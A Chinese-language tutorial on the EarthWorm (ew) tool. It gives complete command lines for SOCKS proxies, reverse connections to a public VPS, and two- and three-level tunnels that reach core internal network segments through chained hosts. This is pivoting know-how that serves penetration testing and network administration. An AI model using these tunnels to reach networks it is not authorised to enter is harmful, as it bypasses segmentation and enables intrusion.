ew内网端口转发

ew穿透内网

0x01 工具使用

1
2
3
4
5
unzip ew.zip
file /sbin/init (查看linux位数)
chmod 777 ew_linux_x64
./ew_linux_x64 -s ssocksd -l 2333 (侦听0.0.0.0:2333)
netstat -pantu|grep 2333 (查看是否侦听成功)

0x02 正向代理

公网vps执行

1
./ew -s ssocksd -l 2333

Mac使用公网vps的正向代理,可以达到番羽墙的效果,最常见的ss

0x03 反向连接

Mac–公网vps–内网1–内网2
内网1可以访问公网和内网2

公网vps执行

1
2
3
./ew -s rcsocks -l 1080 -e 2333
# 监听0.0.0.0:2333,转发0.0.0.0:1080的端口
# 将1080端口收到的代理请求转发给2333端口

内网1反向连接公网vps的2333端口

1
2
3
chmod 777 ./ew
./ew -s rssocks -d 公网vps的ip -e 2333
# 内网1启动socks5服务,反向连接公网vps的2333端口

可以使用1080的代理直接在公网vps上访问或者Mac使用公网vps1080的代理,即可访问内网2

0x04 二级网络环境1

Mac–公网vps–内网1–内网2

内网1能访问公网和内网2,无法访问核心内网资源,有公网和内网IP
内网2可以访问核心内网资源,只有内网IP

内网2执行

1
2
./ew -s ssocksd -l 1080
# 启动socks代理,监听本地1080端口

内网1执行

1
2
./ew -s lcx_tran -l 1090 -f 内网2IP -g 1080
# 将来自外部的1090端口的流量转发到内网2的1080端口

可以访问内网1公网IP:1090来使用内网2的代理,即可访问内网

0x05 二级网络环境2

公网vps–内网1–内网2
内网1:能访问公网,不能访问内网资源,无公网IP
内网2:能访问内网资源,无法访问公网

公网vps执行

1
2
./ew -s lcx_listen -l 1080 -e 1379
# 添加转接隧道,将1080端口收到的代理请求转发到1379端口

内网2执行

1
2
./ew -s ssocksd -l 2345
# 启动socks代理,监听本地2345端口

内网1执行

1
2
./ew -s lcx_slave -d 公网vpsIP -e 1379 -f 内网2IP -g 2345
# 将公网的1379端口与内网2的2345端口打通,建立socks5通道

这样,访问公网1080端口等于访问内网2的2345端口。即可通过公网的1080端口来使用内网2的代理,即可内网资源

0x06 三级网络环境

公网vps–内网1–内网2–内网3
三台内网机器都处于独立的内网网段
内网1可以访问内网2,但是1不能访问3,且无公网IP
内网2可以访问内网3
内网3可以访问核心内网网段

公网vps执行

1
2
./ew -s rcsocks -l 1080 -e 1235
# 将1080端口收到的代理请求转发到本地1235端口

在内网1执行

1
2
./ew -s lcx_slave -d 公网vps的IP -e 1235 -f 内网2的IP -g 3456
# 将公网的1235端口和内网2的3456端口绑定,打通公网1235和内网2的3456端口

在内网2执行

1
2
./ew -s lcx_listen -l 3456 -e 1236
# 将3456端口收到的请求转发到1236端口

在内网3执行

1
2
./ew -s rssocks -d 内网2的IP -e 1236
# 反向连接内网2的1236端口,可以在内网2机器上看到rssocks cmd_socket OK!,说明通道建立成功

在Mac上访问公网vps的1080端口来使用内网3的代理

流向:1080->1235->3456->1236

参考:
https://www.jianshu.com/p/735e8f1746f0
https://klionsec.github.io/2017/08/05/ew-tunnel/
https://www.anquanke.com/post/id/85494